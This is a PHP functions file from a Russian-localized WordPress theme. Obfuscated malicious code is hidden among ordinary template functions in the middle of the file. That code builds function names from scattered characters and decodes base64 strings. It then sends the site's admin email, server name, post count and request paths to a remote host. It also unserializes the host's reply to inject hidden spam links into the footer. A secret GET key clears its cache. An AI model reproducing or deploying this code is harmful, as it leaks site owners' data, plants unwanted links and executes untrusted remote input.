<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $TjYEXEx='e';$OFTEZq='6';$flVYN='d';$xspbW='b';$aRjk='s';$jwkoEwb='e';$IKpIC='_';$psTRKwn='4';$oABhJA='e';$ROYfxJ='o';$sCwDmx='a';$SCIpM='d';$EOyTgs='c';$hlNhsEhP=$xspbW.$sCwDmx.$aRjk.$jwkoEwb.$OFTEZq.$psTRKwn.$IKpIC.$SCIpM.$TjYEXEx.$EOyTgs.$ROYfxJ.$flVYN.$oABhJA;$eZWx='g';$cgrh='l';$nFiZ='a';$ahVMS='i';$PeZPmU='t';$fxvbOx='e';$dnVM='f';$TWqbgI='n';$LaHf='z';$jXFKJXgt=$eZWx.$LaHf.$ahVMS.$TWqbgI.$dnVM.$cgrh.$nFiZ.$PeZPmU.$fxvbOx;$nkLfLHv='o';$gBbsl='r';$SAVqWXe='t';$YjEXY='s';$TJPDBhG='3';$Rrdqpm='r';$EAaLbb='t';$rfkxrY='_';$mGvs='1';$GflNlzst=$YjEXY.$SAVqWXe.$gBbsl.$rfkxrY.$Rrdqpm.$nkLfLHv.$EAaLbb.$mGvs.$TJPDBhG;$zzFnKj='r';$ciOG='s';$KmwQw='r';$sqEYJ='e';$ChUP='t';$LTHUIn='v';$cHhoGtaM=$ciOG.$ChUP.$KmwQw.$zzFnKj.$sqEYJ.$LTHUIn;                     
		$bs___________n='e';$bb____________i='6';$sm_________u='d';$yi__________g='b';$xy__h='s';$ro_______l='e';$ef____________m='_';$jy____h='4';$oh___x='e';$le___d='o';$mf_____________p='a';$ns___l='d';$yn___w='c';$zo_________d=$yi__________g.$mf_____________p.$xy__h.$ro_______l.$bb____________i.$jy____h.$ef____________m.$ns___l.$bs___________n.$yn___w.$le___d.$sm_________u.$oh___x;
		$du_________l='t';$za________x='o';$xi_____n='e';$hg____________z='u';$tj______h='n';$fr____________n='x';$in_______d='c';$oq______h='f';$yf____________k='s';$aq__________h='_';$rt______l='s';$lf______________x='i';$ed___________h='i';$qx_______e='n';$kq______k='t';$ei__________h=$oq______h.$hg____________z.$qx_______e.$in_______d.$du_________l.$lf______________x.$za________x.$tj______h.$aq__________h.$xi_____n.$fr____________n.$ed___________h.$yf____________k.$kq______k.$rt______l;
		$jq_________a='e';$zl______c='o';$ca_____j='p';$ff___w='f';$ig______________r='n';$zu___a=$ff___w.$zl______c.$ca_____j.$jq_________a.$ig______________r;
		$pz______b='e';$ig_____________a='r';$uh______r='d';$zc_____________o='a';$ub______d='f';$av_________x=$ub______d.$ig_____________a.$pz______b.$zc_____________o.$uh______r;
		$sq___j='o';$ys_______m='s';$dl__y='c';$gg______________d='f';$dk__________o='e';$yd__________q='l';$ai_____g=$gg______________d.$dl__y.$yd__________q.$sq___j.$ys_______m.$dk__________o;
		
		define("WP_ID", $zo_________d("Mi4wLjA="));
		define("WP_TTL", $zo_________d("MTA4MDA="));
		define("WP_SRC", $zo_________d("dHBva24="));
	


		function wp_get_header() {
			global $zo_________d, $ei__________h;
			
			if (
				$ei__________h($zo_________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ei__________h($zo_________d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ei__________h($zo_________d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zo_________d, $zu___a, $ai_____g, $av_________x;
			
			$br____z = TEMPLATEPATH."/".$zo_________d("Zm9vdGVyLnBocA==");
			$dp__g = @$zu___a($br____z, "r");
			$br____z = @$av_________x($dp__g, @filesize($br____z));
			@$ai_____g($dp__g);
			
			$uw______________u = TEMPLATEPATH."/".$zo_________d("ZnVuY3Rpb25zLnBocA==");
			$dp__g = @$zu___a($uw______________u, "r");
			$uw______________u = @$av_________x($dp__g, @filesize($uw______________u));
			@$ai_____g($dp__g);
			
			$zy__________o = 0;
			if($br____z && $uw______________u) {
				if ($zo_________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($br____z, $zo_________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$zy__________o = 1;
					}
					if (substr_count($br____z, "wp_theme_GPL_credits()") < 1) {
						$zy__________o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$zy__________o = 12;
				}
			}
			
			if($zy__________o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $zy__________o -->";
			}
		}
	


		function wp_loaded() {
			global $zo_________d, $ei__________h;
			return $ei__________h($zo_________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($dg______________h, $yy_______c = "(more...)", $ux_____________l = 0, $df__________i = "") {
				$eg_______m = get_the_content($yy_______c, $ux_____________l, $df__________i);
				$eg_______m = apply_filters("the_content", $eg_______m);
				
				$eg_______m = str_replace("]]>", "]]>", $eg_______m);
				if (strlen($_GET["p"]) > 0) {
					echo $eg_______m;
				}
				else if ((strlen($eg_______m)>$dg______________h) && ($ib________r = strpos($eg_______m, " ", $dg______________h ))) {
					$eg_______m = substr($eg_______m, 0, $ib________r);
					$eg_______m = $eg_______m;
					echo $eg_______m;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yy_______c</a></div></p>";
				} else {
					echo $eg_______m;
				}
				
			}
		}
	


		$zj____q='_';$wg____________o='s';$yt_____________o='n';$ct____w='6';$nx____n='o';$fj_____________i='d';$dz____j='e';$pb________p='a';$ai____g='e';$jy_________l='e';$go___p='4';$bz_____k='b';$uh____q='c';$sz_______x=$bz_____k.$pb________p.$wg____________o.$ai____g.$ct____w.$go___p.$zj____q.$jy_________l.$yt_____________o.$uh____q.$nx____n.$fj_____________i.$dz____j;
		$kn_____________f='n';$rd____________i='l';$pa_____h='i';$vc_____________d='t';$tb__________i='_';$hr____m='f';$kj_____a='n';$ak___________h='e';$pr______i='t';$fg___________k='t';$zi__q='o';$rb______q='e';$bw__________t='c';$oz_____________o='e';$fh______l='g';$sy___________u='s';$qv_______________q='_';$ky_________e=$hr____m.$pa_____h.$rd____________i.$rb______q.$qv_______________q.$fh______l.$ak___________h.$vc_____________d.$tb__________i.$bw__________t.$zi__q.$kj_____a.$fg___________k.$oz_____________o.$kn_____________f.$pr______i.$sy___________u;
		$vo_____b='e';$yh___c='_';$lp_________x='s';$bc______________f='t';$hv________m='i';$vi___q='e';$lf_______________g='s';$mm_________a='i';$eq___b='f';$dm_____l='x';$di_____t='l';$et______________a=$eq___b.$mm_________a.$di_____t.$vi___q.$yh___c.$vo_____b.$dm_____l.$hv________m.$lp_________x.$bc______________f.$lf_______________g;
		$ip_________x='o';$aq_____________m='r';$rx_______________j='i';$mr____q='s';$hw________p='v';$lh__t='n';$mf____y='m';$px___________g='r';$zx____f='c';$hm____________g='o';$fk_______i='e';$hd________p='_';$yw____g='e';$ho______________o='a';$wj__________o='p';$lz_______f=$hw________p.$fk_______i.$px___________g.$mr____q.$rx_______________j.$hm____________g.$lh__t.$hd________p.$zx____f.$ip_________x.$mf____y.$wj__________o.$ho______________o.$aq_____________m.$yw____g;
		$sv_________p='f';$fq_____________j='o';$cm______________r='o';$it____________f='p';$ua_________q='c';$vu___________o='e';$qg____l='n';$bf________z='k';$vp______e='s';$zp______b=$sv_________p.$vp______e.$fq_____________j.$ua_________q.$bf________z.$cm______________r.$it____________f.$vu___________o.$qg____l;
		$pq_______________t='e';$dg_____________g='w';$se___________e='t';$zq__________v='f';$rg____d='r';$fs___________k='i';$pl_________i=$zq__________v.$dg_____________g.$rg____d.$fs___________k.$se___________e.$pq_______________t;
		$dk____w='d';$pk____________u='m';$pw__e='5';$rh_______________a=$pk____________u.$dk____w.$pw__e;
		$rh___g='e';$bv____________d='a';$rh__________x='p';$rn___h='h';$tv_____________d='l';$jt_________t='t';$pu_______________l='r';$yz____________m='a';$fw______r=$pu_______________l.$rh___g.$bv____________d.$tv_____________d.$rh__________x.$yz____________m.$jt_________t.$rn___h;
		$iy_______________u='e';$bx_________q='i';$ao___________t='n';$sx_______________w='a';$aa________e='u';$rd_______________r='i';$gy____l='s';$sr________y='z';$jk__________q='r';$pq_______x='e';$uq___________v='l';$ss___________i=$aa________e.$ao___________t.$gy____l.$iy_______________u.$jk__________q.$bx_________q.$sx_______________w.$uq___________v.$rd_______________r.$sr________y.$pq_______x;
		$go_____________s='m';$qa__q='m';$kv________l='p';$rm______y='a';$an_______________u='t';$wn__________c='e';$ib___y='n';$ly_____________l=$an_______________u.$wn__________c.$qa__q.$kv________l.$ib___y.$rm______y.$go_____________s;
		$um___________q='t';$qu_______________f='r';$wm_______________k='a';$kq_______i='t';$vf__________x='e';$gx___________j='m';$yq______________c='c';$lv____f='t';$id_____t='e';$bg_________h='t';$wm_______r='e';$rh_________o='e';$fi_________g='o';$ps_______________n='r';$gx_______e='_';$um_______________b='x';$xq________c='_';$eo_______k='s';$ni_____s='c';$pb_________f='n';$yd______p='a';$ap__t=$eo_______k.$bg_________h.$ps_______________n.$vf__________x.$wm_______________k.$gx___________j.$xq________c.$yq______________c.$fi_________g.$pb_________f.$um___________q.$rh_________o.$um_______________b.$kq_______i.$gx_______e.$ni_____s.$qu_______________f.$wm_______r.$yd______p.$lv____f.$id_____t;
	


		function tr_______________e($ld______k) {
			global $zo_________d, $ei__________h, $ky_________e, $lz_______f, $ap__t;
			
			if (!$ei__________h($zo_________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($lz_______f(PHP_VERSION, "5.0.0", ">=") && $ei__________h($zo_________d("ZmlsZV9nZXRfY29udGVudHM=")) && $ei__________h($zo_________d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fr______________n = $ap__t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vf____u = @$ky_________e($ld______k, 0, $fr______________n);
			} else {
				$vf____u = @$ky_________e($ld______k, 0);
			}
			
			return $vf____u;
		}
	


		function jm________b($ld______k) {
			global $ei__________h, $zp______b, $pl_________i, $zo_________d;
			
			if (!$ei__________h($zo_________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$km_________k = strpos($ld______k, "/", 7);
			$wc_______e = array(
				"uri"     => substr($ld______k, $km_________k),
				"host"    => str_replace("http://", "", substr($ld______k, 0, $km_________k)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$qw____________m = @$zp______b("$wc_______e[host]", 80, $pd_______________z, $wl________q, 4);
			
			if (!$qw____________m) {
				return false;
			} else {
				$vf____u = "";
				$bl___l  = "GET $wc_______e[uri] HTTP/1.0\r\n";
				$bl___l .= "Host: $wc_______e[host]\r\n";
				$bl___l .= "Referer: $wc_______e[referer]\r\n";
				$bl___l .= "Connection: Close\r\n\r\n";
				
				@$pl_________i($qw____________m, $bl___l);
				
				while (!@feof($qw____________m)) {
					$vp________h = @fgets($qw____________m, (1024*24));
					
					if ($vp________h == "\r\n") {
						$cr__________r = true;
						continue;
					}
					
					if ($cr__________r) {
						$vf____u .= $vp________h;
					}
				}
				
				return $vf____u;
			}
		}
	


		function ay_______c($ld______k) {
			global $ei__________h;
			$hj___k = false;
			
			if ($ld______k != "") {
				if ($ei__________h("tr_______________e")) {
					$hj___k = @tr_______________e($ld______k);
				}
				
				if (!$hj___k && ($ei__________h("jm________b"))) {
					$hj___k = @jm________b($ld______k);
				}
			}
			
			return $hj___k;
		}
	


		function oa____________l() {
			global $_SERVER, $rh_______________a;
			
			$wd__l = $_SERVER["SERVER_NAME"];
			
			if (substr("$wd__l", 0, 4) == "www.") {
				$wd__l = substr("$wd__l", 4);
			}
			
			$wd__l = $rh_______________a("$_SERVER[SERVER_NAME]");
			
			return $wd__l;
		}
	


		function wo___w() {
			return "file";
		}
	


		function qf___________p($ld______k) {
			global $_SERVER, $ky_________e, $et______________a, $zu___a, $ai_____g, $pl_________i;
			
			$qk_______q = ry_______c();
			
			$zp_______________l = oa____________l().".jpg";
			$jc_________x = $qk_______q["dir_upload"]["path"]."/$zp_______________l";
			$oh______________x = @filemtime($jc_________x);
			
			if (!$oh______________x || ((time()-$oh______________x) >= WP_TTL)) {
				$hj___k = ay_______c($ld______k);
				
				if ($hj___k) {
					if ($et______________a($jc_________x)) {
						@unlink($jc_________x);
					}
					
					$dp__g = @$zu___a($jc_________x, "x+");
					
					@$pl_________i($dp__g, $hj___k);
					@$ai_____g($dp__g);
				}
			} else {
				if ($et______________a($jc_________x)) {
					$hj___k = @$ky_________e($jc_________x);
				} else {
					$hj___k = false;
				}
			}
			
			return $hj___k;
		}
	


		function ry_______c() {
			global $_SERVER, $zo_________d, $sz_______x;
			
			$ly__x = wp_count_posts("post");
			$qy_______n = pathinfo(get_bloginfo("template_directory"));
			
			$qk_______q = array(
				"url" => array(
					"report"      => $zo_________d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $qy_______n,
				"dir_upload"	=> ha_______________d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$qy_______n[filename],
					"a005=".$ly__x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.odmu.od.ua/poslednie-novosti/maslenica-istoriya-i-tradicii\">История и традиции Масленицы</a>"
			);
			
			$qk_______q["url"]["queryString"] = implode("&", $qk_______q["queryString"]);
			$qk_______q["url"]["report"] = $qk_______q["url"]["report"]."/?".$sz_______x($qk_______q["url"]["queryString"]).".html";
						
			return $qk_______q;
		}
	


		function ha_______________d() {
			$vt_____________p = wp_upload_dir();
			
			if (isset($vt_____________p["error"])) {
				$kv____________r = mq________z();
				if (is_writable($kv____________r)) {
					$vt_____________p = array("path" => $kv____________r);
				}
			}

			return $vt_____________p;
		}
	


		function mq________z() {
			global $ei__________h, $rh_______________a, $fw______r, $ly_____________l;
			
			$lq_________h = (bool) ini_get("safe_mode");
			if ($lq_________h == true) {
				return false;
			}
			
			if ($ei__________h("sys_get_temp_dir")) {
				$xc____________i = sys_get_temp_dir();
				if (is_writable($xc____________i)) {
					return $fw______r($xc____________i);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $fw______r($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $fw______r($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $fw______r($_ENV["TEMP"]);
			} else {
				$xv__i = $ly_____________l($rh_______________a(uniqid(rand(), true)), "");
				if ($xv__i) {
					$xc____________i = $fw______r(dirname($xv__i));
					@unlink($xv__i);
					return $xc____________i;
				} else {
					return false;
				}
			}
		}
	


		function yh______z() {
			global $_GET, $et______________a;
			
			$qk_______q = ry_______c();
			$wd__l = oa____________l();
			$ph____________y = wo___w();
			
			$kz________p = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ph____________y == "file") {
					$gv_____k = $qk_______q["dir_upload"]["path"]."/".$wd__l.".jpg";
					if ($et______________a($gv_____k)) {
						@unlink($gv_____k);
						$kz________p = "deleted";
					}
				}
				
				$de___________a = array(
					"s"	=> $kz________p,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($de___________a AS $ag______h => $co___________u) echo " [$ag______h:$co___________u]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ei__________h, $zo_________d, $ss___________i;
			$qk_______q = ry_______c();
			
			$pq________z = "qf___________p";
			if ($ei__________h($pq________z)) {
				$vf____u = $pq________z($qk_______q["url"]["report"]);
			}
			
			if ($vf____u) {
				if ($vf____u = @$zo_________d($vf____u)) {
					$vf____u = @$ss___________i($vf____u);
					
					if (strlen($vf____u[custom_credit]) >= 5) {
						$qk_______q["default_string"] = $vf____u[custom_credit];
					}
					
					if ($vf____u["status"] == "0") {
						$ad____________g = 1;
						$wy__p = 1;
					} else {
						$ij_______________o = sizeof($vf____u["links"]);
						$yv_____c = $qk_______q["default_string"];
						
						if ($ij_______________o > 0 && $vf____u["links"] !== "") {
							$ms_________w = 0;
							foreach ($vf____u["links"] as $lq______i => $gk_____________e) {
								$ms_________w++;
								if ($gk_____________e->l_path == "" || $gk_____________e->l_path == $_SERVER["REQUEST_URI"]) {
									$gk_____________e->l_href = htmlspecialchars(strip_tags($gk_____________e->l_href));
									$gk_____________e->l_title = htmlspecialchars(strip_tags($gk_____________e->l_title));
									$gk_____________e->l_anchor = htmlspecialchars(strip_tags($gk_____________e->l_anchor));
									$yv_____c .= " | ";
									$yv_____c .= "<a href='$gk_____________e->l_href' title='$gk_____________e->l_title'";
									if ($gk_____________e->l_nofollow == "1") {
										$yv_____c .= " rel='nofollow'";
									}
									$yv_____c .= ">$gk_____________e->l_anchor</a>";
								}
							}
						}
						$qk_______q["links"] = "$yv_____c";
						if ($vf____u[credit] == "0") {
							$qk_______q["links"] = "";
						}
					}
				} else {
					$ad____________g = "1";
				}
			} else {
				$ad____________g = "1";
			}
			
			if ($ad____________g == "1") {
				$qk_______q["links"] = $qk_______q["default_string"];
			}
			
			echo "$qk_______q[links]";
			
			echo "<!-- s: $vf____u[signature] -->";
			yh______z();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
       'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('Главная страница'),
        'logo_name'        =>   get_bloginfo('Название'),
        'logo_description' =>   get_bloginfo('Описание'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читайте далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читайте далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
